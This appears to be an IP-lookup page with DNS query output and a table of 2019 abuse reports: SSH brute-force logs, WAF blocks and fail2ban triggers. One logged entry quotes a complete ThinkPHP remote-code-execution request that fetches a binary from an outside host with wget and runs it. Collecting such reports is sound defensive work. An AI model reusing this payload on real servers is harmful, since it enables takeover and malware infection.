城市(city): unknown
省份(region): unknown
国家(country): United States of America (the)
运营商(isp): unknown
主机名(hostname): unknown
机构(organization): unknown
使用类型(Usage Type): unknown
b; <<>> DiG 9.10.3-P4-Ubuntu <<>> 136.49.38.74
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 43693
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;136.49.38.74. IN A
;; AUTHORITY SECTION:
. 30 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2025020600 1800 900 604800 86400
;; Query time: 58 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Fri Feb 07 00:01:34 CST 2025
;; MSG SIZE rcvd: 10574.38.49.136.in-addr.arpa domain name pointer 136-49-38-74.googlefiber.net.Server: 183.60.83.19
Address: 183.60.83.19#53
Non-authoritative answer:
74.38.49.136.in-addr.arpa name = 136-49-38-74.googlefiber.net.
Authoritative answers can be found from:| IP | 类型 | 评论内容 | 时间 |
|---|---|---|---|
| 134.209.35.183 | attack | Jun 28 15:51:52 MK-Soft-Root2 sshd\[21388\]: Invalid user ftptest from 134.209.35.183 port 59291 Jun 28 15:51:52 MK-Soft-Root2 sshd\[21388\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=134.209.35.183 Jun 28 15:51:55 MK-Soft-Root2 sshd\[21388\]: Failed password for invalid user ftptest from 134.209.35.183 port 59291 ssh2 ... |
2019-06-28 22:17:24 |
| 121.152.165.213 | attackspambots | Automatic report - Web App Attack |
2019-06-28 22:15:34 |
| 35.192.32.67 | attackspam | [FriJun2815:48:15.1988882019][:error][pid19996:tid47129072404224][client35.192.32.67:60236][client35.192.32.67]ModSecurity:Accessdeniedwithcode403\(phase2\).Patternmatch"\(\?:\<\|script\|\>\)"atARGS:domain.[file"/etc/apache2/conf.d/modsec_rules/99_asl_jitp.conf"][line"317"][id"347147"][rev"1"][msg"Atomicorp.comWAFRules:Wordpressadmin-ajaxXSSattack"][data"admin-ajax.php"][severity"CRITICAL"][hostname"appetit-sa.ch"][uri"/wp-admin/admin-ajax.php"][unique_id"XRYan74Q6DA1E87EP1SCMQAAAVI"][FriJun2815:50:03.4282142019][:error][pid19998:tid47129061897984][client35.192.32.67:45712][client35.192.32.67]ModSecurity:Accessdeniedwithcode403\(phase2\).Patternmatch"miglaa\?_"atARGS:action.[file"/etc/apache2/conf.d/modsec_rules/99_asl_jitp.conf"][line"60"][id"334072"][rev"5"][msg"Atomicorp.comWAFRules:CVE-2019-6703Attackblocked"][severity"ALERT"][hostname"appetit-sa.ch"][uri"/wp-admin/admin-ajax.php"][unique_id"XRYbC@b2FwWmHlVINHhMYAAAAA0"] |
2019-06-28 23:08:35 |
| 115.254.63.51 | attackbots | Triggered by Fail2Ban at Ares web server |
2019-06-28 22:19:15 |
| 79.7.217.174 | attackbotsspam | Jun 28 15:48:02 mail sshd\[18907\]: Invalid user ubuntu from 79.7.217.174 port 50706 Jun 28 15:48:02 mail sshd\[18907\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=79.7.217.174 Jun 28 15:48:04 mail sshd\[18907\]: Failed password for invalid user ubuntu from 79.7.217.174 port 50706 ssh2 Jun 28 15:50:00 mail sshd\[19074\]: Invalid user mirror01 from 79.7.217.174 port 63734 Jun 28 15:50:00 mail sshd\[19074\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=79.7.217.174 |
2019-06-28 22:34:22 |
| 104.199.50.135 | attackbots | [FriJun2815:51:51.1318612019][:error][pid2712:tid47523391211264][client104.199.50.135:40296][client104.199.50.135]ModSecurity:Accessdeniedwithcode403\(phase2\).Patternmatch"python-requests/"atREQUEST_HEADERS:User-Agent.[file"/usr/local/apache.ea3/conf/modsec_rules/20_asl_useragents.conf"][line"206"][id"332039"][rev"4"][msg"Atomicorp.comWAFRules:SuspiciousUnusualUserAgent\(python-requests\).Disablethisruleifyouusepython-requests/."][severity"CRITICAL"][hostname"bg-sa.ch"][uri"/robots.txt"][unique_id"XRYbd3zaIckZa8ZAoXv-uQAAAEQ"][FriJun2815:51:51.2008002019][:error][pid7148:tid47523405920000][client104.199.50.135:37764][client104.199.50.135]ModSecurity:Accessdeniedwithcode403\(phase2\).Patternmatch"python-requests/"atREQUEST_HEADERS:User-Agent.[file"/usr/local/apache.ea3/conf/modsec_rules/20_asl_useragents.conf"][line"206"][id"332039"][rev"4"][msg"Atomicorp.comWAFRules:SuspiciousUnusualUserAgent\(python-requests\).Disablethisruleifyouusepython-requests/."][severity"CRITICAL"][h |
2019-06-28 22:19:45 |
| 104.236.78.228 | attackspam | Jun 28 15:07:44 mail sshd\[8414\]: Failed password for invalid user tai from 104.236.78.228 port 50954 ssh2 Jun 28 15:22:59 mail sshd\[8583\]: Invalid user zun from 104.236.78.228 port 54706 Jun 28 15:22:59 mail sshd\[8583\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=104.236.78.228 ... |
2019-06-28 22:39:07 |
| 62.75.230.143 | attackbots | 404 NOT FOUND |
2019-06-28 22:45:00 |
| 103.245.181.2 | attack | Jun 28 10:07:46 plusreed sshd[17563]: Invalid user merlin from 103.245.181.2 ... |
2019-06-28 22:31:52 |
| 122.248.37.19 | attack | SMB Server BruteForce Attack |
2019-06-28 22:18:04 |
| 82.194.204.116 | attackbots | 1561611926 - 06/27/2019 12:05:26 Host: dhcp-82-194-204-116.loqal.no/82.194.204.116 Port: 23 TCP Blocked ... |
2019-06-28 23:10:06 |
| 59.4.8.206 | attack | 59.4.8.206 - - \[28/Jun/2019:15:51:46 +0200\] "GET /index.php\?s=/index/\x09hink\x07pp/invokefunction\&function=call_user_func_array\&vars\[0\]=shell_exec\&vars\[1\]\[\]='wget http://198.12.97.68/bins/UnHAnaAW.x86 -O thonkphp \; chmod 777 thonkphp \; ./thonkphp ThinkPHP \; rm -rf thinkphp' HTTP/1.1" 400 173 "-" "Uirusu/2.0" ... |
2019-06-28 22:23:21 |
| 117.50.17.253 | attackspam | Unauthorized SSH login attempts |
2019-06-28 22:44:27 |
| 103.54.28.70 | attackbotsspam | firewall-block, port(s): 80/tcp |
2019-06-28 23:11:33 |
| 223.197.175.171 | attack | 2019-06-28T15:52:05.7786211240 sshd\[22021\]: Invalid user applmgr from 223.197.175.171 port 43772 2019-06-28T15:52:05.7833881240 sshd\[22021\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=223.197.175.171 2019-06-28T15:52:07.6831861240 sshd\[22021\]: Failed password for invalid user applmgr from 223.197.175.171 port 43772 ssh2 ... |
2019-06-28 22:11:26 |